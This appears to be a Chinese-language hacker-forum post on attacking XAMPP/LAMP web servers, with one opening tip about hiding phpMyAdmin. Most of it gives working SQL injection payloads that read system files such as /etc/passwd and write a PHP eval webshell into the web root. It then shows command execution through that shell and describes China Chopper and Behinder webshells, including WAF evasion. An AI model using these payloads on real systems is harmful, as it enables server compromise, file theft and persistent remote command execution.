Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Recommended Posts

一.不要开启phpmyadmin

1.配置文件 /opt/lampp/etc/extra/httpd-xampp.conf

2390162-20220730200832634-1006100126.png

 2.修改phpmyadmin目录名称为不容易猜测的

 

二.SQL注入-文件读写以及木马植入

1.读写权限确认

2390162-20220731093813899-1532125743.png

 secure_file_priv = 空的时候,任意读写

 secure_file_priv = 某个路径的时候,只能在那个路径下读写

 secure_file_priv = NULL,不能读写

 #利用SQL语句读取系统文件

-1 union select 1,2,3,load_file("/etc/passwd"),5

select load_file("/opt/lampp/htdocs/security/common.php")

#利用SQL语句写入系统文件

select "hello world" into outfile "/opt/lampp/htdocs/security/muma.php"

-1 union select 1,2,3,"<?php @eval($_GET['a']);?>",5
into outfile "/opt/lampp/htdocs/security/muma.php"

#访问muma.php执行指令
muma.php?a=system("ifconfig");

三.中国菜刀

1.提前上传了木马

2.请求必须为POST类型,参数自定义

3.传输过程为明文传输,目前已经被WAF给拦截了

 

四.Behinder冰蝎

1.冰蝎是加密传输,防火墙很难分析出流量特征,比较容易绕开WAF

需要先上传一个冰蝎自己带加密解密功能的web shell

a=system("echo "<?php" >> /opt/lampp/htdocs/security/muma.php");

 

Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...